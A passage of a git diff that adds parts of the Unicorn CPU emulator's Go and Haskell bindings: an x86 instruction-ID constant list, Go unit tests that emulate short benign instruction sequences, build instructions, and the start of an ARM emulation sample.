X86_INS_VFMADD231SS = 811 + X86_INS_VFMADDSUB132PD = 812 + X86_INS_VFMADDSUB132PS = 813 + X86_INS_VFMADDSUBPD = 814 + X86_INS_VFMADDSUB213PD = 815 + X86_INS_VFMADDSUB231PD = 816 + X86_INS_VFMADDSUBPS = 817 + X86_INS_VFMADDSUB213PS = 818 + X86_INS_VFMADDSUB231PS = 819 + X86_INS_VFMSUB132PD = 820 + X86_INS_VFMSUB132PS = 821 + X86_INS_VFMSUBADD132PD = 822 + X86_INS_VFMSUBADD132PS = 823 + X86_INS_VFMSUBADDPD = 824 + X86_INS_VFMSUBADD213PD = 825 + X86_INS_VFMSUBADD231PD = 826 + X86_INS_VFMSUBADDPS = 827 + X86_INS_VFMSUBADD213PS = 828 + X86_INS_VFMSUBADD231PS = 829 + X86_INS_VFMSUBPD = 830 + X86_INS_VFMSUB213PD = 831 + X86_INS_VFMSUB231PD = 832 + X86_INS_VFMSUBPS = 833 + X86_INS_VFMSUB213PS = 834 + X86_INS_VFMSUB231PS = 835 + X86_INS_VFMSUBSD = 836 + X86_INS_VFMSUB213SD = 837 + X86_INS_VFMSUB132SD = 838 + X86_INS_VFMSUB231SD = 839 + X86_INS_VFMSUBSS = 840 + X86_INS_VFMSUB213SS = 841 + X86_INS_VFMSUB132SS = 842 + X86_INS_VFMSUB231SS = 843 + X86_INS_VFNMADD132PD = 844 + X86_INS_VFNMADD132PS = 845 + X86_INS_VFNMADDPD = 846 + X86_INS_VFNMADD213PD = 847 + X86_INS_VFNMADD231PD = 848 + X86_INS_VFNMADDPS = 849 + X86_INS_VFNMADD213PS = 850 + X86_INS_VFNMADD231PS = 851 + X86_INS_VFNMADDSD = 852 + X86_INS_VFNMADD213SD = 853 + X86_INS_VFNMADD132SD = 854 + X86_INS_VFNMADD231SD = 855 + X86_INS_VFNMADDSS = 856 + X86_INS_VFNMADD213SS = 857 + X86_INS_VFNMADD132SS = 858 + X86_INS_VFNMADD231SS = 859 + X86_INS_VFNMSUB132PD = 860 + X86_INS_VFNMSUB132PS = 861 + X86_INS_VFNMSUBPD = 862 + X86_INS_VFNMSUB213PD = 863 + X86_INS_VFNMSUB231PD = 864 + X86_INS_VFNMSUBPS = 865 + X86_INS_VFNMSUB213PS = 866 + X86_INS_VFNMSUB231PS = 867 + X86_INS_VFNMSUBSD = 868 + X86_INS_VFNMSUB213SD = 869 + X86_INS_VFNMSUB132SD = 870 + X86_INS_VFNMSUB231SD = 871 + X86_INS_VFNMSUBSS = 872 + X86_INS_VFNMSUB213SS = 873 + X86_INS_VFNMSUB132SS = 874 + X86_INS_VFNMSUB231SS = 875 + X86_INS_VFRCZPD = 876 + X86_INS_VFRCZPS = 877 + X86_INS_VFRCZSD = 878 + X86_INS_VFRCZSS = 879 + X86_INS_VORPD = 880 + X86_INS_VORPS = 881 + X86_INS_VXORPD = 882 + X86_INS_VXORPS = 883 + X86_INS_VGATHERDPD = 884 + X86_INS_VGATHERDPS = 885 + X86_INS_VGATHERPF0DPD = 886 + X86_INS_VGATHERPF0DPS = 887 + X86_INS_VGATHERPF0QPD = 888 + X86_INS_VGATHERPF0QPS = 889 + X86_INS_VGATHERPF1DPD = 890 + X86_INS_VGATHERPF1DPS = 891 + X86_INS_VGATHERPF1QPD = 892 + X86_INS_VGATHERPF1QPS = 893 + X86_INS_VGATHERQPD = 894 + X86_INS_VGATHERQPS = 895 + X86_INS_VHADDPD = 896 + X86_INS_VHADDPS = 897 + X86_INS_VHSUBPD = 898 + X86_INS_VHSUBPS = 899 + X86_INS_VINSERTF128 = 900 + X86_INS_VINSERTF32X4 = 901 + X86_INS_VINSERTF32X8 = 902 + X86_INS_VINSERTF64X2 = 903 + X86_INS_VINSERTF64X4 = 904 + X86_INS_VINSERTI128 = 905 + X86_INS_VINSERTI32X4 = 906 + X86_INS_VINSERTI32X8 = 907 + X86_INS_VINSERTI64X2 = 908 + X86_INS_VINSERTI64X4 = 909 + X86_INS_VINSERTPS = 910 + X86_INS_VLDDQU = 911 + X86_INS_VLDMXCSR = 912 + X86_INS_VMASKMOVDQU = 913 + X86_INS_VMASKMOVPD = 914 + X86_INS_VMASKMOVPS = 915 + X86_INS_VMAXPD = 916 + X86_INS_VMAXPS = 917 + X86_INS_VMAXSD = 918 + X86_INS_VMAXSS = 919 + X86_INS_VMCALL = 920 + X86_INS_VMCLEAR = 921 + X86_INS_VMFUNC = 922 + X86_INS_VMINPD = 923 + X86_INS_VMINPS = 924 + X86_INS_VMINSD = 925 + X86_INS_VMINSS = 926 + X86_INS_VMLAUNCH = 927 + X86_INS_VMLOAD = 928 + X86_INS_VMMCALL = 929 + X86_INS_VMOVQ = 930 + X86_INS_VMOVDDUP = 931 + X86_INS_VMOVD = 932 + X86_INS_VMOVDQA32 = 933 + X86_INS_VMOVDQA64 = 934 + X86_INS_VMOVDQA = 935 + X86_INS_VMOVDQU16 = 936 + X86_INS_VMOVDQU32 = 937 + X86_INS_VMOVDQU64 = 938 + X86_INS_VMOVDQU8 = 939 + X86_INS_VMOVDQU = 940 + X86_INS_VMOVHLPS = 941 + X86_INS_VMOVHPD = 942 + X86_INS_VMOVHPS = 943 + X86_INS_VMOVLHPS = 944 + X86_INS_VMOVLPD = 945 + X86_INS_VMOVLPS = 946 + X86_INS_VMOVMSKPD = 947 + X86_INS_VMOVMSKPS = 948 + X86_INS_VMOVNTDQA = 949 + X86_INS_VMOVNTDQ = 950 + X86_INS_VMOVNTPD = 951 + X86_INS_VMOVNTPS = 952 + X86_INS_VMOVSD = 953 + X86_INS_VMOVSHDUP = 954 + X86_INS_VMOVSLDUP = 955 + X86_INS_VMOVSS = 956 + X86_INS_VMOVUPD = 957 + X86_INS_VMOVUPS = 958 + X86_INS_VMPSADBW = 959 + X86_INS_VMPTRLD = 960 + X86_INS_VMPTRST = 961 + X86_INS_VMREAD = 962 + X86_INS_VMRESUME = 963 + X86_INS_VMRUN = 964 + X86_INS_VMSAVE = 965 + X86_INS_VMULPD = 966 + X86_INS_VMULPS = 967 + X86_INS_VMULSD = 968 + X86_INS_VMULSS = 969 + X86_INS_VMWRITE = 970 + X86_INS_VMXOFF = 971 + X86_INS_VMXON = 972 + X86_INS_VPABSB = 973 + X86_INS_VPABSD = 974 + X86_INS_VPABSQ = 975 + X86_INS_VPABSW = 976 + X86_INS_VPACKSSDW = 977 + X86_INS_VPACKSSWB = 978 + X86_INS_VPACKUSDW = 979 + X86_INS_VPACKUSWB = 980 + X86_INS_VPADDB = 981 + X86_INS_VPADDD = 982 + X86_INS_VPADDQ = 983 + X86_INS_VPADDSB = 984 + X86_INS_VPADDSW = 985 + X86_INS_VPADDUSB = 986 + X86_INS_VPADDUSW = 987 + X86_INS_VPADDW = 988 + X86_INS_VPALIGNR = 989 + X86_INS_VPANDD = 990 + X86_INS_VPANDND = 991 + X86_INS_VPANDNQ = 992 + X86_INS_VPANDN = 993 + X86_INS_VPANDQ = 994 + X86_INS_VPAND = 995 + X86_INS_VPAVGB = 996 + X86_INS_VPAVGW = 997 + X86_INS_VPBLENDD = 998 + X86_INS_VPBLENDMB = 999 + X86_INS_VPBLENDMD = 1000 + X86_INS_VPBLENDMQ = 1001 + X86_INS_VPBLENDMW = 1002 + X86_INS_VPBLENDVB = 1003 + X86_INS_VPBLENDW = 1004 + X86_INS_VPBROADCASTB = 1005 + X86_INS_VPBROADCASTD = 1006 + X86_INS_VPBROADCASTMB2Q = 1007 + X86_INS_VPBROADCASTMW2D = 1008 + X86_INS_VPBROADCASTQ = 1009 + X86_INS_VPBROADCASTW = 1010 + X86_INS_VPCLMULQDQ = 1011 + X86_INS_VPCMOV = 1012 + X86_INS_VPCMPB = 1013 + X86_INS_VPCMPD = 1014 + X86_INS_VPCMPEQB = 1015 + X86_INS_VPCMPEQD = 1016 + X86_INS_VPCMPEQQ = 1017 + X86_INS_VPCMPEQW = 1018 + X86_INS_VPCMPESTRI = 1019 + X86_INS_VPCMPESTRM = 1020 + X86_INS_VPCMPGTB = 1021 + X86_INS_VPCMPGTD = 1022 + X86_INS_VPCMPGTQ = 1023 + X86_INS_VPCMPGTW = 1024 + X86_INS_VPCMPISTRI = 1025 + X86_INS_VPCMPISTRM = 1026 + X86_INS_VPCMPQ = 1027 + X86_INS_VPCMPUB = 1028 + X86_INS_VPCMPUD = 1029 + X86_INS_VPCMPUQ = 1030 + X86_INS_VPCMPUW = 1031 + X86_INS_VPCMPW = 1032 + X86_INS_VPCOMB = 1033 + X86_INS_VPCOMD = 1034 + X86_INS_VPCOMPRESSD = 1035 + X86_INS_VPCOMPRESSQ = 1036 + X86_INS_VPCOMQ = 1037 + X86_INS_VPCOMUB = 1038 + X86_INS_VPCOMUD = 1039 + X86_INS_VPCOMUQ = 1040 + X86_INS_VPCOMUW = 1041 + X86_INS_VPCOMW = 1042 + X86_INS_VPCONFLICTD = 1043 + X86_INS_VPCONFLICTQ = 1044 + X86_INS_VPERM2F128 = 1045 + X86_INS_VPERM2I128 = 1046 + X86_INS_VPERMD = 1047 + X86_INS_VPERMI2D = 1048 + X86_INS_VPERMI2PD = 1049 + X86_INS_VPERMI2PS = 1050 + X86_INS_VPERMI2Q = 1051 + X86_INS_VPERMIL2PD = 1052 + X86_INS_VPERMIL2PS = 1053 + X86_INS_VPERMILPD = 1054 + X86_INS_VPERMILPS = 1055 + X86_INS_VPERMPD = 1056 + X86_INS_VPERMPS = 1057 + X86_INS_VPERMQ = 1058 + X86_INS_VPERMT2D = 1059 + X86_INS_VPERMT2PD = 1060 + X86_INS_VPERMT2PS = 1061 + X86_INS_VPERMT2Q = 1062 + X86_INS_VPEXPANDD = 1063 + X86_INS_VPEXPANDQ = 1064 + X86_INS_VPEXTRB = 1065 + X86_INS_VPEXTRD = 1066 + X86_INS_VPEXTRQ = 1067 + X86_INS_VPEXTRW = 1068 + X86_INS_VPGATHERDD = 1069 + X86_INS_VPGATHERDQ = 1070 + X86_INS_VPGATHERQD = 1071 + X86_INS_VPGATHERQQ = 1072 + X86_INS_VPHADDBD = 1073 + X86_INS_VPHADDBQ = 1074 + X86_INS_VPHADDBW = 1075 + X86_INS_VPHADDDQ = 1076 + X86_INS_VPHADDD = 1077 + X86_INS_VPHADDSW = 1078 + X86_INS_VPHADDUBD = 1079 + X86_INS_VPHADDUBQ = 1080 + X86_INS_VPHADDUBW = 1081 + X86_INS_VPHADDUDQ = 1082 + X86_INS_VPHADDUWD = 1083 + X86_INS_VPHADDUWQ = 1084 + X86_INS_VPHADDWD = 1085 + X86_INS_VPHADDWQ = 1086 + X86_INS_VPHADDW = 1087 + X86_INS_VPHMINPOSUW = 1088 + X86_INS_VPHSUBBW = 1089 + X86_INS_VPHSUBDQ = 1090 + X86_INS_VPHSUBD = 1091 + X86_INS_VPHSUBSW = 1092 + X86_INS_VPHSUBWD = 1093 + X86_INS_VPHSUBW = 1094 + X86_INS_VPINSRB = 1095 + X86_INS_VPINSRD = 1096 + X86_INS_VPINSRQ = 1097 + X86_INS_VPINSRW = 1098 + X86_INS_VPLZCNTD = 1099 + X86_INS_VPLZCNTQ = 1100 + X86_INS_VPMACSDD = 1101 + X86_INS_VPMACSDQH = 1102 + X86_INS_VPMACSDQL = 1103 + X86_INS_VPMACSSDD = 1104 + X86_INS_VPMACSSDQH = 1105 + X86_INS_VPMACSSDQL = 1106 + X86_INS_VPMACSSWD = 1107 + X86_INS_VPMACSSWW = 1108 + X86_INS_VPMACSWD = 1109 + X86_INS_VPMACSWW = 1110 + X86_INS_VPMADCSSWD = 1111 + X86_INS_VPMADCSWD = 1112 + X86_INS_VPMADDUBSW = 1113 + X86_INS_VPMADDWD = 1114 + X86_INS_VPMASKMOVD = 1115 + X86_INS_VPMASKMOVQ = 1116 + X86_INS_VPMAXSB = 1117 + X86_INS_VPMAXSD = 1118 + X86_INS_VPMAXSQ = 1119 + X86_INS_VPMAXSW = 1120 + X86_INS_VPMAXUB = 1121 + X86_INS_VPMAXUD = 1122 + X86_INS_VPMAXUQ = 1123 + X86_INS_VPMAXUW = 1124 + X86_INS_VPMINSB = 1125 + X86_INS_VPMINSD = 1126 + X86_INS_VPMINSQ = 1127 + X86_INS_VPMINSW = 1128 + X86_INS_VPMINUB = 1129 + X86_INS_VPMINUD = 1130 + X86_INS_VPMINUQ = 1131 + X86_INS_VPMINUW = 1132 + X86_INS_VPMOVDB = 1133 + X86_INS_VPMOVDW = 1134 + X86_INS_VPMOVM2B = 1135 + X86_INS_VPMOVM2D = 1136 + X86_INS_VPMOVM2Q = 1137 + X86_INS_VPMOVM2W = 1138 + X86_INS_VPMOVMSKB = 1139 + X86_INS_VPMOVQB = 1140 + X86_INS_VPMOVQD = 1141 + X86_INS_VPMOVQW = 1142 + X86_INS_VPMOVSDB = 1143 + X86_INS_VPMOVSDW = 1144 + X86_INS_VPMOVSQB = 1145 + X86_INS_VPMOVSQD = 1146 + X86_INS_VPMOVSQW = 1147 + X86_INS_VPMOVSXBD = 1148 + X86_INS_VPMOVSXBQ = 1149 + X86_INS_VPMOVSXBW = 1150 + X86_INS_VPMOVSXDQ = 1151 + X86_INS_VPMOVSXWD = 1152 + X86_INS_VPMOVSXWQ = 1153 + X86_INS_VPMOVUSDB = 1154 + X86_INS_VPMOVUSDW = 1155 + X86_INS_VPMOVUSQB = 1156 + X86_INS_VPMOVUSQD = 1157 + X86_INS_VPMOVUSQW = 1158 + X86_INS_VPMOVZXBD = 1159 + X86_INS_VPMOVZXBQ = 1160 + X86_INS_VPMOVZXBW = 1161 + X86_INS_VPMOVZXDQ = 1162 + X86_INS_VPMOVZXWD = 1163 + X86_INS_VPMOVZXWQ = 1164 + X86_INS_VPMULDQ = 1165 + X86_INS_VPMULHRSW = 1166 + X86_INS_VPMULHUW = 1167 + X86_INS_VPMULHW = 1168 + X86_INS_VPMULLD = 1169 + X86_INS_VPMULLQ = 1170 + X86_INS_VPMULLW = 1171 + X86_INS_VPMULUDQ = 1172 + X86_INS_VPORD = 1173 + X86_INS_VPORQ = 1174 + X86_INS_VPOR = 1175 + X86_INS_VPPERM = 1176 + X86_INS_VPROTB = 1177 + X86_INS_VPROTD = 1178 + X86_INS_VPROTQ = 1179 + X86_INS_VPROTW = 1180 + X86_INS_VPSADBW = 1181 + X86_INS_VPSCATTERDD = 1182 + X86_INS_VPSCATTERDQ = 1183 + X86_INS_VPSCATTERQD = 1184 + X86_INS_VPSCATTERQQ = 1185 + X86_INS_VPSHAB = 1186 + X86_INS_VPSHAD = 1187 + X86_INS_VPSHAQ = 1188 + X86_INS_VPSHAW = 1189 + X86_INS_VPSHLB = 1190 + X86_INS_VPSHLD = 1191 + X86_INS_VPSHLQ = 1192 + X86_INS_VPSHLW = 1193 + X86_INS_VPSHUFB = 1194 + X86_INS_VPSHUFD = 1195 + X86_INS_VPSHUFHW = 1196 + X86_INS_VPSHUFLW = 1197 + X86_INS_VPSIGNB = 1198 + X86_INS_VPSIGND = 1199 + X86_INS_VPSIGNW = 1200 + X86_INS_VPSLLDQ = 1201 + X86_INS_VPSLLD = 1202 + X86_INS_VPSLLQ = 1203 + X86_INS_VPSLLVD = 1204 + X86_INS_VPSLLVQ = 1205 + X86_INS_VPSLLW = 1206 + X86_INS_VPSRAD = 1207 + X86_INS_VPSRAQ = 1208 + X86_INS_VPSRAVD = 1209 + X86_INS_VPSRAVQ = 1210 + X86_INS_VPSRAW = 1211 + X86_INS_VPSRLDQ = 1212 + X86_INS_VPSRLD = 1213 + X86_INS_VPSRLQ = 1214 + X86_INS_VPSRLVD = 1215 + X86_INS_VPSRLVQ = 1216 + X86_INS_VPSRLW = 1217 + X86_INS_VPSUBB = 1218 + X86_INS_VPSUBD = 1219 + X86_INS_VPSUBQ = 1220 + X86_INS_VPSUBSB = 1221 + X86_INS_VPSUBSW = 1222 + X86_INS_VPSUBUSB = 1223 + X86_INS_VPSUBUSW = 1224 + X86_INS_VPSUBW = 1225 + X86_INS_VPTESTMD = 1226 + X86_INS_VPTESTMQ = 1227 + X86_INS_VPTESTNMD = 1228 + X86_INS_VPTESTNMQ = 1229 + X86_INS_VPTEST = 1230 + X86_INS_VPUNPCKHBW = 1231 + X86_INS_VPUNPCKHDQ = 1232 + X86_INS_VPUNPCKHQDQ = 1233 + X86_INS_VPUNPCKHWD = 1234 + X86_INS_VPUNPCKLBW = 1235 + X86_INS_VPUNPCKLDQ = 1236 + X86_INS_VPUNPCKLQDQ = 1237 + X86_INS_VPUNPCKLWD = 1238 + X86_INS_VPXORD = 1239 + X86_INS_VPXORQ = 1240 + X86_INS_VPXOR = 1241 + X86_INS_VRCP14PD = 1242 + X86_INS_VRCP14PS = 1243 + X86_INS_VRCP14SD = 1244 + X86_INS_VRCP14SS = 1245 + X86_INS_VRCP28PD = 1246 + X86_INS_VRCP28PS = 1247 + X86_INS_VRCP28SD = 1248 + X86_INS_VRCP28SS = 1249 + X86_INS_VRCPPS = 1250 + X86_INS_VRCPSS = 1251 + X86_INS_VRNDSCALEPD = 1252 + X86_INS_VRNDSCALEPS = 1253 + X86_INS_VRNDSCALESD = 1254 + X86_INS_VRNDSCALESS = 1255 + X86_INS_VROUNDPD = 1256 + X86_INS_VROUNDPS = 1257 + X86_INS_VROUNDSD = 1258 + X86_INS_VROUNDSS = 1259 + X86_INS_VRSQRT14PD = 1260 + X86_INS_VRSQRT14PS = 1261 + X86_INS_VRSQRT14SD = 1262 + X86_INS_VRSQRT14SS = 1263 + X86_INS_VRSQRT28PD = 1264 + X86_INS_VRSQRT28PS = 1265 + X86_INS_VRSQRT28SD = 1266 + X86_INS_VRSQRT28SS = 1267 + X86_INS_VRSQRTPS = 1268 + X86_INS_VRSQRTSS = 1269 + X86_INS_VSCATTERDPD = 1270 + X86_INS_VSCATTERDPS = 1271 + X86_INS_VSCATTERPF0DPD = 1272 + X86_INS_VSCATTERPF0DPS = 1273 + X86_INS_VSCATTERPF0QPD = 1274 + X86_INS_VSCATTERPF0QPS = 1275 + X86_INS_VSCATTERPF1DPD = 1276 + X86_INS_VSCATTERPF1DPS = 1277 + X86_INS_VSCATTERPF1QPD = 1278 + X86_INS_VSCATTERPF1QPS = 1279 + X86_INS_VSCATTERQPD = 1280 + X86_INS_VSCATTERQPS = 1281 + X86_INS_VSHUFPD = 1282 + X86_INS_VSHUFPS = 1283 + X86_INS_VSQRTPD = 1284 + X86_INS_VSQRTPS = 1285 + X86_INS_VSQRTSD = 1286 + X86_INS_VSQRTSS = 1287 + X86_INS_VSTMXCSR = 1288 + X86_INS_VSUBPD = 1289 + X86_INS_VSUBPS = 1290 + X86_INS_VSUBSD = 1291 + X86_INS_VSUBSS = 1292 + X86_INS_VTESTPD = 1293 + X86_INS_VTESTPS = 1294 + X86_INS_VUNPCKHPD = 1295 + X86_INS_VUNPCKHPS = 1296 + X86_INS_VUNPCKLPD = 1297 + X86_INS_VUNPCKLPS = 1298 + X86_INS_VZEROALL = 1299 + X86_INS_VZEROUPPER = 1300 + X86_INS_WAIT = 1301 + X86_INS_WBINVD = 1302 + X86_INS_WRFSBASE = 1303 + X86_INS_WRGSBASE = 1304 + X86_INS_WRMSR = 1305 + X86_INS_XABORT = 1306 + X86_INS_XACQUIRE = 1307 + X86_INS_XBEGIN = 1308 + X86_INS_XCHG = 1309 + X86_INS_XCRYPTCBC = 1310 + X86_INS_XCRYPTCFB = 1311 + X86_INS_XCRYPTCTR = 1312 + X86_INS_XCRYPTECB = 1313 + X86_INS_XCRYPTOFB = 1314 + X86_INS_XEND = 1315 + X86_INS_XGETBV = 1316 + X86_INS_XLATB = 1317 + X86_INS_XRELEASE = 1318 + X86_INS_XRSTOR = 1319 + X86_INS_XRSTOR64 = 1320 + X86_INS_XRSTORS = 1321 + X86_INS_XRSTORS64 = 1322 + X86_INS_XSAVE = 1323 + X86_INS_XSAVE64 = 1324 + X86_INS_XSAVEC = 1325 + X86_INS_XSAVEC64 = 1326 + X86_INS_XSAVEOPT = 1327 + X86_INS_XSAVEOPT64 = 1328 + X86_INS_XSAVES = 1329 + X86_INS_XSAVES64 = 1330 + X86_INS_XSETBV = 1331 + X86_INS_XSHA1 = 1332 + X86_INS_XSHA256 = 1333 + X86_INS_XSTORE = 1334 + X86_INS_XTEST = 1335 + X86_INS_FDISI8087_NOP = 1336 + X86_INS_FENI8087_NOP = 1337 + X86_INS_ENDING = 1338 +) \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/x86_test.go b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/x86_test.go new file mode 100644 index 0000000..803c646 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/x86_test.go @@ -0,0 +1,185 @@ +package unicorn + +import ( + "testing" +) + +var ADDRESS uint64 = 0x1000000 + +func MakeUc(mode int, code string) (Unicorn, error) { + mu, err := NewUnicorn(ARCH_X86, mode) + if err != nil { + return nil, err + } + if err := mu.MemMap(ADDRESS, 2*1024*1024); err != nil { + return nil, err + } + if err := mu.MemWrite(ADDRESS, []byte(code)); err != nil { + return nil, err + } + if err := mu.RegWrite(X86_REG_ECX, 0x1234); err != nil { + return nil, err + } + if err := mu.RegWrite(X86_REG_EDX, 0x7890); err != nil { + return nil, err + } + return mu, nil +} + +func TestX86(t *testing.T) { + code := "\x41\x4a" + mu, err := MakeUc(MODE_32, code) + if err != nil { + t.Fatal(err) + } + if err := mu.Start(ADDRESS, ADDRESS+uint64(len(code))); err != nil { + t.Fatal(err) + } + ecx, _ := mu.RegRead(X86_REG_ECX) + edx, _ := mu.RegRead(X86_REG_EDX) + if ecx != 0x1235 || edx != 0x788f { + t.Fatal("Bad register values.") + } +} + +func TestX86InvalidRead(t *testing.T) { + code := "\x8B\x0D\xAA\xAA\xAA\xAA\x41\x4a" + mu, err := MakeUc(MODE_32, code) + if err != nil { + t.Fatal(err) + } + err = mu.Start(ADDRESS, ADDRESS+uint64(len(code))) + if err.(UcError) != ERR_READ_UNMAPPED { + t.Fatal("Expected ERR_READ_INVALID") + } + ecx, _ := mu.RegRead(X86_REG_ECX) + edx, _ := mu.RegRead(X86_REG_EDX) + if ecx != 0x1234 || edx != 0x7890 { + t.Fatal("Bad register values.") + } +} + +func TestX86InvalidWrite(t *testing.T) { + code := "\x89\x0D\xAA\xAA\xAA\xAA\x41\x4a" + mu, err := MakeUc(MODE_32, code) + if err != nil { + t.Fatal(err) + } + err = mu.Start(ADDRESS, ADDRESS+uint64(len(code))) + if err.(UcError) != ERR_WRITE_UNMAPPED { + t.Fatal("Expected ERR_WRITE_INVALID") + } + ecx, _ := mu.RegRead(X86_REG_ECX) + edx, _ := mu.RegRead(X86_REG_EDX) + if ecx != 0x1234 || edx != 0x7890 { + t.Fatal("Bad register values.") + } +} + +func TestX86InOut(t *testing.T) { + code := "\x41\xE4\x3F\x4a\xE6\x46\x43" + mu, err := MakeUc(MODE_32, code) + if err != nil { + t.Fatal(err) + } + var outVal uint64 + var inCalled, outCalled bool + mu.HookAdd(HOOK_INSN, func(_ Unicorn, port, size uint32) uint32 { + inCalled = true + switch size { + case 1: + return 0xf1 + case 2: + return 0xf2 + case 4: + return 0xf4 + default: + return 0 + } + }, 1, 0, X86_INS_IN) + mu.HookAdd(HOOK_INSN, func(_ Unicorn, port, size, value uint32) { + outCalled = true + var err error + switch size { + case 1: + outVal, err = mu.RegRead(X86_REG_AL) + case 2: + outVal, err = mu.RegRead(X86_REG_AX) + case 4: + outVal, err = mu.RegRead(X86_REG_EAX) + } + if err != nil { + t.Fatal(err) + } + }, 1, 0, X86_INS_OUT) + if err := mu.Start(ADDRESS, ADDRESS+uint64(len(code))); err != nil { + t.Fatal(err) + } + if !inCalled || !outCalled { + t.Fatal("Ports not accessed.") + } + if outVal != 0xf1 { + t.Fatal("Incorrect OUT value.") + } +} + +func TestX86Syscall(t *testing.T) { + code := "\x0f\x05" + mu, err := MakeUc(MODE_64, code) + if err != nil { + t.Fatal(err) + } + mu.HookAdd(HOOK_INSN, func(_ Unicorn) { + rax, _ := mu.RegRead(X86_REG_RAX) + mu.RegWrite(X86_REG_RAX, rax+1) + }, 1, 0, X86_INS_SYSCALL) + mu.RegWrite(X86_REG_RAX, 0x100) + err = mu.Start(ADDRESS, ADDRESS+uint64(len(code))) + if err != nil { + t.Fatal(err) + } + v, _ := mu.RegRead(X86_REG_RAX) + if v != 0x101 { + t.Fatal("Incorrect syscall return value.") + } +} + +func TestX86Mmr(t *testing.T) { + mu, err := MakeUc(MODE_64, "") + if err != nil { + t.Fatal(err) + } + err = mu.RegWriteMmr(X86_REG_GDTR, &X86Mmr{Selector: 0, Base: 0x1000, Limit: 0x1fff, Flags: 0}) + if err != nil { + t.Fatal(err) + } + mmr, err := mu.RegReadMmr(X86_REG_GDTR) + if mmr.Selector != 0 || mmr.Base != 0x1000 || mmr.Limit != 0x1fff || mmr.Flags != 0 { + t.Fatalf("mmr read failed: %#v", mmr) + } +} + +func BenchmarkX86Hook(b *testing.B) { + // loop rax times + code := "\x48\xff\xc8\x48\x83\xf8\x00\x0f\x8f\xf3\xff\xff\xff" + mu, err := MakeUc(MODE_64, code) + if err != nil { + b.Fatal(err) + } + count := 0 + mu.HookAdd(HOOK_CODE, func(_ Unicorn, addr uint64, size uint32) { + count++ + }, 1, 0) + mu.RegWrite(X86_REG_RAX, uint64(b.N)) + b.ResetTimer() + if err := mu.Start(ADDRESS, ADDRESS+uint64(len(code))); err != nil { + b.Fatal(err) + } + rax, _ := mu.RegRead(X86_REG_RAX) + if rax != 0 { + b.Errorf("benchmark fell short: rax (%d) != 0", rax) + } + if count != b.N*3 { + b.Fatalf("benchmark fell short: %d < %d", count, b.N) + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/.gitignore b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/.gitignore new file mode 100644 index 0000000..9966d82 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/.gitignore @@ -0,0 +1,24 @@ +dist +cabal-dev +*.o +*.hi +*.chi +*.chs.h +*.dyn_o +*.dyn_hi +.virtualenv +.hpc +.hsenv +.cabal-sandbox/ +cabal.sandbox.config +*.prof +*.aux +*.hp +SampleArm +SampleArm64 +SampleM68k +SampleMips +SampleSparc +SampleX86 +Shellcode +SampleBatchReg diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/README.TXT b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/README.TXT new file mode 100644 index 0000000..93766f6 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/README.TXT @@ -0,0 +1,31 @@ +This documentation explains how to install Haskell binding for Unicorn +from source. + + +0. Install the core engine as dependency + + Follow README in the root directory to compile & install the core. + + On *nix, this can simply be done by (project root directory): + + $ sudo ./make.sh install + + +1. Change directories into the Haskell bindings, build and install + + $ cd bindings/haskell + $ cabal install + + +If you are installing into a sandbox, run `cabal sandbox init` before +installing Unicorn's dependencies. + +If the build fails, install c2hs manually `cabal install c2hs` (note that this +will probably also require you to run `cabal install alex` and `cabal install +happy` as well). If you are NOT using a sandbox, ensure that `$HOME/.cabal/bin` +is on your PATH. + +To build a sample (after having built and installed the Haskell bindings) + + $ cd bindings/haskell + $ ghc --make samples/SampleArm.hs diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/Setup.hs b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/Setup.hs new file mode 100644 index 0000000..9a994af --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/Setup.hs @@ -0,0 +1,2 @@ +import Distribution.Simple +main = defaultMain diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/samples/SampleArm.hs b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/samples/SampleArm.hs new file mode 100644 index 0000000..37fac09 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/samples/SampleArm.hs @@ -0,0 +1,134 @@ +-- Sample code to demonstrate how to emulate ARM code + +import Unicorn +import Unicorn.Hook +import qualified Unicorn.CPU.Arm as Arm + +import Data.Bits +import qualified Data.ByteString as BS +import Data.Word +import qualified Numeric as N (showHex) + +-- Code to be emulated +-- +-- mov r0, #0x37; sub r1, r2, r3 +armCode :: BS.ByteString +armCode = BS.pack [0x37, 0x00, 0xa0, 0xe3, 0x03, 0x10, 0x42, 0xe0] + +-- sub sp, #0xc +thumbCode :: BS.ByteString +thumbCode = BS.pack [0x83, 0xb0] + +-- Memory address where emulation starts +address :: Word64 +address = 0x10000 + +-- Pretty-print integral as hex +showHex :: (Integral a, Show a) => a -> String +showHex = + flip N.showHex "" + +-- Calculate code length +codeLength :: Num a => BS.ByteString -> a +codeLength = + fromIntegral . BS.length + +hookBlock :: BlockHook () +hookBlock _ addr size _ = + putStrLn $ ">>> Tracing basic block at 0x" ++ showHex addr ++ + ", block size = 0x" ++ (maybe "0" showHex size) + +hookCode :: CodeHook () +hookCode _ addr size _ = + putStrLn $ ">>> Tracing instruction at 0x" ++ showHex addr ++ + ", instruction size = 0x" ++ (maybe "0" showHex size) + +testArm :: IO () +testArm = do + putStrLn "Emulate ARM code" + + result <- runEmulator $ do + -- Initialize emulator in ARM mode + uc <- open ArchArm [ModeArm] + + -- Map 2MB memory for this emulation + memMap uc address (2 * 1024 * 1024) [ProtAll] + + -- Write machine code to be emulated to memory + memWrite uc address armCode + + -- Initialize machine registers + regWrite uc Arm.R0 0x1234 + regWrite uc Arm.R2 0x6789 + regWrite uc Arm.R3 0x3333 + + -- Tracing all basic blocks with customized callback + blockHookAdd uc hookBlock () 1 0 + + -- Tracing one instruction at address with customized callback + codeHookAdd uc hookCode () address address + + -- Emulate machine code in infinite time (last param = Nothing), or + -- when finishing all the code + let 